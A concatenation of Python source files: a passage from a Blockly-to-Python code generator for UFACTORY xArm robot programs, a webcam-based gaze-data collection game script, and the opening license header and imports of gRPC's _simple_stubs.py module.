self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(analogs[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'cgpio\'][\'analog\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'cgpio\'][\'analog\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'digital\'] = digitals')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'analog\'] = analogs')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'digital_o\'] = digitals_o')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'analog_o\'] = analogs_o')
self._insert_to_file(self.index, ' self.is_init_cgpio_state = True')
self._insert_to_file(self.index, ' time.sleep(0.1)')
self._insert_to_file(self.index, '\nparams[\'events\'][\'gpio\'] = {}()'.format(name2))
self._events['gpio'] = {}
if not gpio_type.startswith('listen'):
if gpio_type not in self._events['gpio']:
self._events['gpio'][gpio_type] = 2
else:
self._events['gpio'][gpio_type] += 1
self._hasEvent = True
def _handle_event_gpio_digital(self, block, prefix='', arg_map=None):
self.__handle_gpio_event('tgpio_digital', block, prefix, arg_map=arg_map)
def _handle_event_gpio_analog(self, block, prefix='', arg_map=None):
self.__handle_gpio_event('tgpio_analog', block, prefix, arg_map=arg_map)
def _handle_event_gpio_controller_digital(self, block, prefix, arg_map=None):
self.__handle_gpio_event('cgpio_digital', block, prefix, arg_map=arg_map)
def _handle_event_gpio_controller_analog(self, block, prefix, arg_map=None):
self.__handle_gpio_event('cgpio_analog', block, prefix, arg_map=arg_map)
def _handle_gpio_controller_digitals_listen(self, block, prefix, arg_map=None):
self.__handle_gpio_event('listen_cgpio_state', block, prefix, arg_map=arg_map)
def _handle_event_gpio_controller_digital_di(self, block, prefix, arg_map=None):
self.__handle_gpio_event('cgpio_digital', block, prefix, arg_map=arg_map)
# def _handle_event_gpio_digital(self, block, prefix=''):
# fields = self.get_nodes('field', root=block)
# io = fields[0].text
# trigger = fields[1].text
#
# if 'gpio' not in self._events:
# num = 1
# else:
# num = self._events['gpio'] + 1
# name = '{}_io{}_is_{}_{}'.format(block.attrib['type'], io, trigger.lower(), num)
# self._append_to_file('\n\n{}# Define TGPIO-{} is {} callback'.format(prefix, io, trigger))
# self._append_to_file('{}def {}():'.format(prefix, name))
# old_prefix = prefix
# prefix = ' ' + prefix
# statement = self.get_node('statement', root=block)
# if statement:
# self.parse(statement, prefix)
# else:
# self._append_to_file('{}pass'.format(prefix))
# self._append_to_file('\n{}params[\'events\'][\'gpio\'].callbacks[\'IO{}\'][{}].append({})'.format(
# old_prefix, io, 1 if trigger == 'HIGH' else 0, name))
# self._append_to_file('{}if not params[\'events\'][\'gpio\'].alive:'.format(old_prefix))
# self._append_to_file('{} params[\'events\'][\'gpio\'].start()'.format(old_prefix))
#
# if 'gpio' not in self._events:
# name2 = 'EventGPIOThread'.format(io, trigger.capitalize())
# self._insert_to_file(self.index, '\n\n# Define GPIO callback handle thread')
# self._insert_to_file(self.index, 'class {}(threading.Thread):'.format(name2))
# self._insert_to_file(self.index, ' def __init__(self, *args, **kwargs):'
# '\n threading.Thread.__init__(self, *args, **kwargs)')
# self._insert_to_file(self.index, ' self.daemon = True')
# self._insert_to_file(self.index, ' self.alive = False')
# self._insert_to_file(self.index, ' self.digital = [-1, -1]')
# self._insert_to_file(self.index, ' self.callbacks = {\'IO0\': {0: [], 1: []}, '
# '\'IO1\': {0: [], 1: []}}')
# self._insert_to_file(self.index, '\n def run(self):')
# self._insert_to_file(self.index, ' self.alive = True')
# self._insert_to_file(self.index, ' while arm.connected and arm.error_code == 0:')
# self._insert_to_file(self.index, ' _, digital = arm.get_tgpio_digital()')
# self._insert_to_file(self.index, ' if _ == 0:')
# self._insert_to_file(self.index, ' if digital[0] != self.digital[0]:')
# self._insert_to_file(self.index, ' for callback in self.callbacks[\'IO0\'][digital[0]]:')
# self._insert_to_file(self.index, ' callback()')
# self._insert_to_file(self.index, ' if digital[1] != self.digital[1]:')
# self._insert_to_file(self.index, ' for callback in self.callbacks[\'IO1\'][digital[1]]:')
# self._insert_to_file(self.index, ' callback()')
# self._insert_to_file(self.index, ' if _ == 0:')
# self._insert_to_file(self.index, ' self.digital = digital')
# self._insert_to_file(self.index, ' time.sleep(0.1)')
# self._insert_to_file(self.index, '\nparams[\'events\'][\'gpio\'] = {}()'.format(name2))
#
# if 'gpio' not in self._events:
# self._events['gpio'] = 2
# else:
# self._events['gpio'] += 1
#
# self._hasEvent = True
def _handle_procedures_defnoreturn(self, block, prefix='', arg_map=None):
if not self._func_cls_exist:
name = 'MyDef'
self._insert_to_file(self.first_index, '\n\n# Define Mydef class')
self._insert_to_file(self.first_index, 'class {}(object):'.format(name))
self._insert_to_file(self.first_index,
' def __init__(self, *args, **kwargs):\n pass')
self._func_cls_exist = True
field = self.get_node('field', block).text
if not field:
field = '1'
if field not in self._funcs:
name = 'function_{}'.format(self.func_index)
else:
name = self._funcs[field]
self._is_insert = True
try:
args = self.get_nodes('arg', root=self.get_node('mutation', block))
arg_map_ = None
self._append_to_file('\n @classmethod')
if not args:
self._append_to_file(' def {}(cls):'.format(name))
else:
arg_list = [arg.attrib['name'] for arg in args]
# arg_map_ = {arg: arg for i, arg in enumerate(arg_list)}
arg_map_ = {arg: 'arg_{}'.format(i + 1) for i, arg in enumerate(arg_list)}
self._append_to_file(' def {}(cls, {}):'.format(name, ','.join(map(lambda x: arg_map_[x], arg_list))))
# self._append_to_file(' def {}(cls):'.format(name))
prefix = ' '
comment = self.get_node('comment', block).text
self._append_to_file('{}"""'.format(prefix))
self._append_to_file('{}{}'.format(prefix, comment))
self._append_to_file('{}"""'.format(prefix))
statement = self.get_node('statement', root=block)
if statement:
self.parse(statement, prefix, arg_map=arg_map_)
else:
self._append_to_file('{}pass'.format(prefix))
self._funcs[field] = name
return arg_map_
except:
self._succeed = False
finally:
self._is_insert = False
def _handle_procedures_defreturn(self, block, prefix='', arg_map=None):
arg_map_ = self._handle_procedures_defnoreturn(block, prefix)
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map_)
self._is_insert = True
prefix = ' '
self._append_to_file('{}return {}'.format(prefix, expression))
self._is_insert = False
def _handle_procedures_callnoreturn(self, block, prefix='', arg_map=None):
mutation = self.get_node('mutation', block).attrib['name']
if not mutation:
mutation = '1'
if mutation in self._funcs:
name = self._funcs[mutation]
else:
name = 'function_{}'.format(self.func_index)
args = self.get_nodes('arg', root=self.get_node('mutation', block))
values = self.get_nodes('value', root=block)
if args and values and len(args) == len(values):
self._append_to_file('{}MyDef.{}({})'.format(prefix, name, ','.join([self.__get_condition_expression(val, arg_map=arg_map) for val in values])))
else:
self._append_to_file('{}MyDef.{}()'.format(prefix, name))
# self._append_to_file('{}MyDef.{}()'.format(prefix, name))
self._funcs[mutation] = name
def _handle_procedures_ifreturn(self, block, prefix='', arg_map=None):
self._is_insert = True
values = self.get_nodes('value', block)
expression = self.__get_condition_expression(values[0], arg_map=arg_map)
self._append_to_file('{}if {}:'.format(prefix, expression))
expression = self.__get_condition_expression(values[1], arg_map=arg_map)
self._append_to_file('{} return {}'.format(prefix, expression))
self._is_insert = False
def _handle_procedures_callreturn(self, block, prefix='', arg_map=None):
self._handle_procedures_callnoreturn(block, prefix, arg_map=arg_map)
def _handle_variables_set(self, block, prefix='', arg_map=None):
field = self.get_node('field', block).text
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
# self._append_to_file('{}params[\'variables\'][\'{}\'] = {}'.format(prefix, field, expression))
prefix = self.__check_is_quit(prefix)
if arg_map and field in arg_map:
self._append_to_file('{}{} = {}'.format(prefix, arg_map[field], expression))
else:
self._append_to_file('{}params[\'variables\'][\'{}\'] = {}'.format(prefix, field, expression))
# self._append_to_file('{}if \'{}\' not in locals_keys and \'{}\' in locals():'.format(prefix, field, field))
# self._append_to_file('{} {} = {}'.format(prefix, field, expression))
# self._append_to_file('{}else:'.format(prefix))
# self._append_to_file('{} params[\'variables\'][\'{}\'] = {}'.format(prefix, field, expression))
def _handle_math_change(self, block, prefix='', arg_map=None):
field = self.get_node('field', block).text
value = self.get_node('value', root=block)
shadow = self.get_node('shadow', root=value)
val = self.get_node('field', root=shadow).text
# self._append_to_file('{}params[\'variables\'][\'{}\'] += {}'.format(prefix, field, val))
prefix = self.__check_is_quit(prefix)
if arg_map and field in arg_map:
self._append_to_file('{}{} += {}'.format(prefix, arg_map[field], val))
else:
self._append_to_file('{}params[\'variables\'][\'{}\'] += {}'.format(prefix, field, val))
# self._append_to_file('{}if \'{}\' not in locals_keys and \'{}\' in locals():'.format(prefix, field, field))
# self._append_to_file('{} {} += {}'.format(prefix, field, val))
# self._append_to_file('{}else:'.format(prefix))
# self._append_to_file('{} params[\'variables\'][\'{}\'] += {}'.format(prefix, field, val))
def _handle_controls_repeat_ext(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
# times = self.get_nodes('field', root=value, descendant=True)[0].text
times = self.__get_block_val(value, arg_map=arg_map)
self._append_to_file('{}for i in range(int({})):'.format(prefix, times))
prefix = ' ' + prefix
self._append_to_file('{}if params[\'quit\']:'.format(prefix))
self._append_to_file('{} break'.format(prefix))
statement = self.get_node('statement', root=block)
if statement:
if self._highlight_callback:
self._append_to_file('{}t1 = time.time()'.format(prefix))
self.parse(statement, prefix, arg_map=arg_map)
if self._highlight_callback:
self._append_to_file('{}interval = time.time() - t1'.format(prefix))
self._append_to_file('{}if interval < 0.001:'.format(prefix))
self._append_to_file('{} time.sleep(0.001 - interval)'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
# def handle_controls_for(self, block, prefix=''):
# print(block.attrib.get('disabled', False))
def _handle_controls_whileUntil(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field.text == 'WHILE':
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
self._append_to_file('{}while {} and not params[\'quit\']:'.format(prefix, expression))
elif field.text == 'UNTIL':
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
self._append_to_file('{}while not {} and not params[\'quit\']:'.format(prefix, expression))
prefix = ' ' + prefix
statement = self.get_node('statement', root=block)
if statement:
if self._highlight_callback:
self._append_to_file('{}t1 = time.time()'.format(prefix))
self.parse(statement, prefix, arg_map=arg_map)
if self._highlight_callback:
self._append_to_file('{}interval = time.time() - t1'.format(prefix))
self._append_to_file('{}if interval < 0.001:'.format(prefix))
self._append_to_file('{} time.sleep(0.001 - interval)'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
def _handle_loop_run_forever(self, block, prefix='', arg_map=None):
self._append_to_file('{}while True:'.format(prefix))
prefix = ' ' + prefix
self._append_to_file('{}if params[\'quit\']:'.format(prefix))
self._append_to_file('{} break'.format(prefix))
statement = self.get_node('statement', root=block)
if statement:
if self._highlight_callback:
self._append_to_file('{}t1 = time.time()'.format(prefix))
self.parse(statement, prefix, arg_map=arg_map)
if self._highlight_callback:
self._append_to_file('{}interval = time.time() - t1'.format(prefix))
self._append_to_file('{}if interval < 0.001:'.format(prefix))
self._append_to_file('{} time.sleep(0.001 - interval)'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
def _handle_loop_break(self, block, prefix='', arg_map=None):
self._append_to_file('{}break'.format(prefix))
def _handle_tool_comment(self, block, prefix='', arg_map=None):
field = self.get_node('field', block)
self._append_to_file('{}# {}'.format(prefix, field.text))
statement = self.get_node('statement', block)
if statement:
self.parse(statement, prefix, arg_map=arg_map)
def _handle_tool_app_comment(self, block, prefix='', arg_map=None):
field = self.get_node('field', block)
self._append_to_file('{}# [APP] {}'.format(prefix, field.text))
statement = self.get_node('statement', block)
if statement:
self.parse(statement, prefix, arg_map=arg_map)
def _handle_tool_remark(self, block, prefix='', arg_map=None):
field = self.get_node('field', block)
self._append_to_file('{}# {}'.format(prefix, field.text))
def _handle_controls_if(self, block, prefix='', arg_map=None):
values = self.get_nodes('value', root=block)
statements = self.get_nodes('statement', root=block)
old_prefix = prefix
has_if = False
for i, value in enumerate(values):
prefix = old_prefix
expression = self.__get_condition_expression(value, arg_map=arg_map)
if not has_if:
has_if = True
self._append_to_file('{}if {}:'.format(prefix, expression))
else:
self._append_to_file('{}elif {}:'.format(prefix, expression))
old_prefix = prefix
prefix = ' ' + prefix
statement = None
for st in statements:
if st.attrib['name'][2:] == value.attrib['name'][2:]:
statement = st
break
if statement:
self.parse(statement, prefix, arg_map=arg_map)
else:
self._append_to_file('{}pass'.format(prefix))
for st in statements:
if st.attrib['name'] == 'ELSE':
if has_if:
self._append_to_file('{}else:'.format(old_prefix))
self.parse(st, old_prefix if not has_if else ' ' + old_prefix, arg_map=arg_map)
break
# value = self.get_node('value', root=block)
# expression = self.__get_condition_expression(value)
# self._append_to_file('{}if {}:'.format(prefix, expression))
# old_prefix = prefix
# prefix = ' ' + prefix
# statement_if = self.get_nodes('statement', root=block, name='DO0')
# statement_else = self.get_nodes('statement', root=block, name='ELSE')
# if statement_if:
# self.parse(statement_if[0], prefix)
# if statement_else:
# self._append_to_file('{}else:'.format(old_prefix))
# self.parse(statement_else[0], prefix)
# else:
# self._append_to_file('{}pass'.format(prefix))
# statement = self.get_node('statement', root=block)
# if statement:
# self.parse(statement, prefix)
# else:
# self._append_to_file('{}pass'.format(prefix))
def __get_condition_expression(self, value_block, arg_map=None):
block = self.get_node('block', value_block)
if block is None:
shadow = self.get_node('shadow', root=value_block)
return self.get_node('field', root=shadow).text
if block.attrib['type'] == 'logic_boolean':
return str(self.get_node('field', block).text == 'TRUE')
elif block.attrib['type'] == 'logic_compare':
op = self._ops.get(self.get_node('field', block).text)
cond_a = 0
cond_b = 0
values = self.get_nodes('value', block)
if len(values) > 0:
cond_a = self.__get_condition_expression(values[0], arg_map=arg_map)
if len(values) > 1:
cond_b = self.__get_condition_expression(values[1], arg_map=arg_map)
return '{} {} {}'.format(cond_a, op, cond_b)
elif block.attrib['type'] == 'logic_operation':
op = self.get_node('field', block).text.lower()
cond_a = False
cond_b = False
values = self.get_nodes('value', block)
if len(values) > 0:
cond_a = self.__get_condition_expression(values[0], arg_map=arg_map)
if len(values) > 1:
cond_b = self.__get_condition_expression(values[1], arg_map=arg_map)
return '{} {} {}'.format(cond_a, op, cond_b)
elif block.attrib['type'] == 'logic_negate':
value = self.get_node('value', root=block)
return 'not ({})'.format(self.__get_condition_expression(value, arg_map=arg_map))
elif block.attrib['type'] == 'gpio_get_digital':
io = self.get_node('field', block).text
return 'arm.get_tgpio_digital({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_analog':
io = self.get_node('field', block).text
return 'arm.get_tgpio_analog({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_controller_digital':
io = self.get_node('field', block).text
return 'arm.get_cgpio_digital({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_controller_digital_di':
io = self.get_node('field', block).text
return 'arm.get_cgpio_digital({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_controller_analog':
io = self.get_node('field', block).text
return 'arm.get_cgpio_analog({})[{}]'.format(io, 1)
elif block.attrib['type'] == 'gpio_get_ci':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'digital\'][{}] if \'gpio\' in params[\'events\'] else 1'.format(io)
elif block.attrib['type'] == 'gpio_get_co':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'digital_o\'][{}] if \'gpio\' in params[\'events\'] else 0'.format(io)
elif block.attrib['type'] == 'gpio_get_ai':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'analog\'][{}] if \'gpio\' in params[\'events\'] else 0'.format(io)
elif block.attrib['type'] == 'gpio_get_ao':
io = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].values[\'cgpio\'][\'analog_o\'][{}] if \'gpio\' in params[\'events\'] else 0'.format(io)
elif block.attrib['type'] == 'gpio_match_controller_digitals_bin':
bin_val = self.get_node('field', block).text
return 'params[\'events\'][\'gpio\'].cgpio_digitals_is_matchs_bin(\'{}\') if \'gpio\' in params[\'events\'] else False'.format(
bin_val)
elif block.attrib['type'] == 'get_suction_cup':
return 'arm.get_suction_cup()[{}]'.format(1)
elif block.attrib['type'] == 'check_air_pump_state':
fields = self.get_nodes('field', root=block)
state = 1 if fields[0].text == 'ON' else 0
timeout = float(fields[1].text)
return 'arm.arm.check_air_pump_state({}, timeout={})'.format(state, timeout)
elif block.attrib['type'] == 'check_bio_gripper_is_catch':
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
return 'arm.arm.check_bio_gripper_is_catch(timeout={}) == True'.format(timeout)
elif block.attrib['type'] == 'check_robotiq_is_catch':
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
return 'arm.arm.check_robotiq_is_catch(timeout={}) == True'.format(timeout)
elif block.attrib['type'] == 'math_number':
val = self.get_node('field', block).text
return val
elif block.attrib['type'] == 'math_arithmetic':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) > 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
if field == 'ADD':
return '({} + {})'.format(val_a, val_b)
elif field == 'MINUS':
return '({} - {})'.format(val_a, val_b)
elif field == 'MULTIPLY':
return '({} * {})'.format(val_a, val_b)
elif field == 'DIVIDE':
return '({} / {})'.format(val_a, val_b)
elif field == 'POWER':
return 'pow({}, {})'.format(val_a, val_b)
elif block.attrib['type'] == 'math_number_property':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'EVEN':
# 偶数
return '{} % 2 == 0'.format(val_a)
elif field == 'ODD':
# 奇数
return '{} % 2 == 1'.format(val_a)
elif field == 'PRIME':
# 质数
return 'utils.is_prime({})'.format(val_a)
elif field == 'WHOLE':
return '{} % 1 == 0'.format(val_a)
elif field == 'POSITIVE':
# 正数
return '{} > 0'.format(val_a)
elif field == 'NEGATIVE':
# 负数
return '{} < 0'.format(val_a)
elif field == 'DIVISIBLE_BY':
# 可被整除
if len(values) > 1:
val_b = self.__get_block_val(values[1], arg_map=arg_map)
else:
val_b = 0
return '{} % {} == 0'.format(val_a, val_b)
elif block.attrib['type'] == 'math_random_int':
values = self.get_nodes('value', block)
if len(values) > 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
return 'random.randint({}, {})'.format(val_a, val_b)
elif block.attrib['type'] == 'math_round':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'ROUND':
# 四舍五入
return 'round({})'.format(val_a)
elif field == 'ROUNDUP':
# 上舍入
return 'math.ceil({})'.format(val_a)
elif field == 'ROUNDDOWN':
# 下舍入
return 'math.floor({})'.format(val_a)
elif block.attrib['type'] == 'math_single':
# 算术函数
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'ROOT':
# 平方根
return 'math.sqrt({})'.format(val_a)
elif field == 'ABS':
# 绝对值
return 'abs({})'.format(val_a)
elif field == 'NEG':
# 相反数
return '-{}'.format(val_a)
elif field == 'LN':
# ln
return 'math.log({})'.format(val_a)
elif field == 'LOG10':
# log10
return '(math.log({}) / math.log(10))'.format(val_a)
elif field == 'EXP':
# exp
return 'math.exp({})'.format(val_a)
elif field == 'POW10':
# 10的多少次方
return 'math.pow(10, {})'.format(val_a)
elif block.attrib['type'] == 'math_trig':
# 三角函数
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
if len(values) >= 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
if field == 'SIN':
return 'math.sin({})'.format(val_a)
elif field == 'COS':
return 'math.cos({})'.format(val_a)
elif field == 'TAN':
return 'math.tan({})'.format(val_a)
elif field == 'ASIN':
return 'math.asin({})'.format(val_a)
elif field == 'ACOS':
return 'math.acos({})'.format(val_a)
elif field == 'ATAN':
return 'math.atan({})'.format(val_a)
elif block.attrib['type'] == 'math_constant':
# 常量
field = self.get_node('field', block).text
if field == 'PI':
return 'math.pi'
elif field == 'E':
return 'math.e'
elif field == 'GOLDEN_RATIO':
return '(1 + math.sqrt(5)) / 2'
elif field == 'SQRT2':
return 'math.sqrt(2)'
elif field == 'SQRT1_2':
return 'math.sqrt(0.5)'
elif field == 'INFINITY':
return 'math.inf'
elif block.attrib['type'] == 'math_modulo':
values = self.get_nodes('value', block)
if len(values) > 1:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
return '{} % {}'.format(val_a, val_b)
elif block.attrib['type'] == 'math_constrain':
values = self.get_nodes('value', block)
if len(values) > 2:
val_a = self.__get_block_val(values[0], arg_map=arg_map)
val_b = self.__get_block_val(values[1], arg_map=arg_map)
val_c = self.__get_block_val(values[2], arg_map=arg_map)
return 'min(max({}, {}), {})'.format(val_a, val_b, val_c)
# elif block.attrib['type'] == 'math_round':
# pass
elif block.attrib['type'] == 'variables_get':
field = self.get_node('field', block).text
# return '(params[\'variables\'].get(\'{}\', 0) if \'{}\' in locals_keys or \'{}\' not in locals() else {})'.format(field, field, field, field)
if arg_map and field in arg_map:
return '{}'.format(arg_map[field])
else:
return 'params[\'variables\'].get(\'{}\', 0)'.format(field)
elif block.attrib['type'] == 'move_var':
val = self.get_node('field', block).text
return val
elif block.attrib['type'] == 'tool_get_date':
return 'datetime.datetime.now()'
elif block.attrib['type'] == 'tool_combination':
field = self.get_node('field', block).text
values = self.get_nodes('value', block)
var1 = self.__get_condition_expression(values[0], arg_map=arg_map)
var2 = self.__get_condition_expression(values[1], arg_map=arg_map)
return '\'{{}}{{}}{{}}\'.format({}, \'{}\', {})'.format(var1, field, var2)
elif block.attrib['type'] == 'procedures_callreturn':
mutation = self.get_node('mutation', block).attrib['name']
if not mutation:
mutation = '1'
if mutation in self._funcs:
name = self._funcs[mutation]
else:
name = 'function_{}'.format(self.func_index)
args = self.get_nodes('arg', root=self.get_node('mutation', block))
values = self.get_nodes('value', root=block)
if args and values and len(args) == len(values):
return 'MyDef.{}({})'.format(name, ','.join(
[self.__get_condition_expression(val, arg_map=arg_map) for val in values]))
else:
return 'MyDef.{}()'.format(name)
# return 'MyDef.{}()'.format(name)
def __get_block_val(self, block, arg_map=None):
block_v = self.get_node('block', root=block)
if block_v is not None:
val = self.__get_condition_expression(block, arg_map=arg_map)
else:
shadow = self.get_node('shadow', root=block)
val = self.get_node('field', root=shadow).text
return val
def _handle_set_line_track(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
if fields is not None:
pos = fields[0].text
speed = fields[1].text
wait = True
else:
values = self.get_nodes('value', root=block)
pos = self.get_nodes('field', root=values[0], descendant=True)[0].text
speed = self.get_nodes('field', root=values[1], descendant=True)[0].text
wait = True
if self._show_comment:
self._append_to_file('{}# set line track position and '.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_linear_track_pos({}, speed={}, wait={}, auto_enable=True)'.format(prefix, pos, speed, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_linear_track_pos, code={{}}\'.format(code))'.format(prefix))
def _handle_set_line_track_origin(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set_line_track_origin(wait=True, auto_enable=True)'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_linear_track_back_origin(wait=True, auto_enable=True)'.format(prefix))
self._append_to_file('{} code = arm.set_linear_track_enable(True)'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'line_track_back_origin, code={{}}\'.format(code))'.format(prefix))
if __name__ == '__main__':
blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm6\\app\\myapp\local_test_1\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm6\\app\\myapp\\app_template\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm6\\app\\myapp\\test_gpio\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm7\\app\\myapp\\pour_water\\app.xml')
# blockly = BlocklyTool('C:\\Users\\ufactory\\.UFACTORY\projects\\test\\xarm7\\app\\myapp\\233\\app.xml')
import os
target_path = os.path.join(os.path.expanduser('~'), '.UFACTORY', 'app', 'tmp')
if not os.path.exists(target_path):
os.makedirs(target_path)
target_file = os.path.join(target_path, 'blockly_app.py')
blockly.to_python(target_file, arm='192.168.1.145')
|
data_creation_game4.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 7 11:00:24 2020
@author: djoghurt
"""
import cv2
import numpy as np
import dlib
from math import hypot
import pyautogui
import random
import subprocess
import json
import threading
import time
import os
receiveBuffer = ""
receiveStatus = 0
DATA = ""
stopReader = False
class screenShape:
width = 0
height = 0
def create_dot(screen, screenSize):
screen.fill(255)
x = random.randint(1, screenSize.width)
y = random.randint(1, screenSize.height)
cv2.circle(screen, (x,y), 10, (0,0,255), -1)
return (x,y)
def dotGreen(screen, targetLoc):
#print("dotGreen")
screen.fill(255)
cv2.circle(screen, targetLoc, 10, (0,255,0), -1)
def save_data():
pass
def game_init(screenSize, fullScreen=True):
screen = np.zeros([screenSize.height,screenSize.width,3],dtype=np.uint8)
screen.fill(255)
targetLoc = (int(screenSize.width/2),int(screenSize.height/2))
cv2.circle(screen, targetLoc, 10, (0,0,255), -1)
if fullScreen==True:
cv2.namedWindow("window", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("window",cv2.WND_PROP_FULLSCREEN,cv2.WINDOW_FULLSCREEN)
return screen, screenSize, targetLoc
def dataReceiver(process):
global receiveBuffer, receiveStatus, DATA, stopReader
newData = False
while(stopReader==False and process.poll()==None):
outputRaw = process.stdout.readline()
output = str(outputRaw.strip())[2:-1]
index = output.find("<data>")
if index > -1:
#print("start!")
receiveBuffer = ""
output = output[index+6:]
if receiveStatus==1:
print("WARNING: I received a data start key without finishing my previous data read, data might be corrupted!")
receiveStatus = 1
index = output.find("</data>")
if index > -1:
#print("stop!")
receiveBuffer = receiveBuffer+output[:index]
#print(receiveBuffer)
receiveStatus = 0
DATA = receiveBuffer
newData = True
if receiveStatus==1:
receiveBuffer = receiveBuffer+output
process.kill()
def startupRecognition():
global DATA, stopReader
#process = subprocess.Popen(['echo', '"Hello stdout"'], stdout=subprocess.PIPE)
#process = subprocess.Popen(["python", "testPrinter.py"], stdout=subprocess.PIPE)
process = subprocess.Popen(["python", "featureGrabber.py"], stdout=subprocess.PIPE)
threadReader = threading.Thread(target=dataReceiver, args=(process,))
threadReader.start()
print("waiting for the recognition model to start up, this can take a minute")
print("please make sure privacy cover is away from the camera")
t=0
timer=0
while process.poll() is None and len(DATA)==0: # wait untill first data is received
t=t+1
if t>100000:
print(".", end='')
t=0
timer=timer+1
assert len(DATA)>0,"ERROR: something went wrong, couldn't have communication with the recognition model"
print("took us",timer)
print("\nlets goooo!!!")
return process
def storeDatapoint(targetLoc):
global DATA
print("targetLoc:",targetLoc,"DATA:",DATA)
data = DATA
DATA=""
data = json.loads(data)
def main():
global stopReader
started=False
process = startupRecognition()
screenSize = pyautogui.size()
screenSize = screenShape()
screenSize.width = 100
screenSize.height = 100
screen, screenSize, targetLoc = game_init(screenSize, fullScreen=False)
while True:
cv2.imshow('window', screen)
if len(DATA)>0:
dotGreen(screen, targetLoc)
key = cv2.waitKey(1)
if key == 32:
if len(DATA)>0:
if started:
storeDatapoint(targetLoc)
else:
started=True
targetLoc = create_dot(screen, screenSize)
else:
print("no new data")
#cv2.putText(screen, 'face', (10,30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255),2, cv2.LINE_AA)
if key == 27:
stopReader=True
print("quitting")
break
if process.poll() is not None:
print("the model stopped, will quit now too")
stopReader=True
break
cv2.destroyAllWindows()
main()
|
_simple_stubs.py
|
# Copyright 2020 The gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions that obviate explicit stubs and explicit channels."""
import collections
import datetime
import os
import logging
import threading
from typing import (Any, AnyStr, Callable, Dict, Iterator, Optional, Sequence,
Tuple, TypeVar, Union)
import grpc
from grpc.experimental import experimental_api
RequestType = TypeVar('RequestType')
ResponseType = TypeVar('ResponseType')
OptionsType = Sequence[Tuple[str, str]]
CacheKey = Tuple[str, OptionsType, Optional[grpc.ChannelCredentials], Optional[
grpc.Compression]]
_LOGGER = logging.getLogger(__name__)
